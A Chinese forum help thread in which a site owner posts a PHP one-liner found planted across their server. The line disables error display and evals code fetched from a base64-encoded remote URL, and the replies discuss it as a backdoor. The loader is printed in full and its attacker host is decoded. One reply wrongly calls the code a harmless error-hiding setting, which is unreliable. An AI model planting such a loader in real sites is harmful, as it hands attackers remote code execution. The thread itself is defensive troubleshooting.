【求助】无意间发现服务器网站里有很多这样的文件

不羁zz

各种名为“web”,"image","log",“cache”并且没有后缀的文件，每个文件夹下都有。内容为：

[PHP] 纯文本查看 复制代码

<?php ini_set("display_errors", "off");eval('?>'.file_get_contents(base64_decode('aHR0cDovLzgubGFpdGUwMDIuY2MvanNjL3hnanNjLnR4dA==')));?>

且都一致。请教大神，这段代码有什么作用？能做什么？有什么危害？该如何防止再次发生？

javasu

明显是被人挂马啦，后边就是执行base64解码地址的内容

chenxk

这段代码是用于关闭 PHP 错误报告的。通过设置 ini_set("display_errors", "off");，PHP 将不会显示错误信息。这通常在生产环境中使用，以避免向用户展示敏感的错误信息。

最初的未来

使用ini_set函数关闭了错误显示（display_errors设置为"off"），这意味着任何错误都不会显示给终端用户。

使用eval函数执行了一段由base64_decode解码后的字符串内容。

l-l ttp://8.laite002.cc/jsc/xgjsc.txt
xgjsc.txt 内容是一个 PHP 的文件



ttp://mulu.laite002.cc:81
ttp://jschl.nn02.cc

综合判断， 你的网站被黑了，，， 文件上传漏洞和命令执行漏洞。
解决： 买个 WAF 设备，更新代码，更新网站的底层应用

LeonardFrye

网站被人搞后门了，通过这个函数连接base64后面加密的数据，把服务停一停，找找有没有马，以后挂个日志啥的方便检测